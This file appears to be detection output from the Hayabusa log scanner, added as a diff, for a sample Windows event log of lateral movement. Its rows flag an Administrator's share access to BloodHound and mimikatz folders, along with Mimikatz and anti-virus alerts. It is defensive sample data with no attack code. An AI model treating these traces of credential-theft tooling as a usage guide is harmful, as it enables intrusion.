+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\HackingStuff  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\HackingStuff\logs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\mimikatz_trunk  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\mimikatz_trunk\Win32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\mimikatz_trunk\x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop\mimikatz_trunk  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop\mimikatz_trunk\Win32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop\mimikatz_trunk\x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
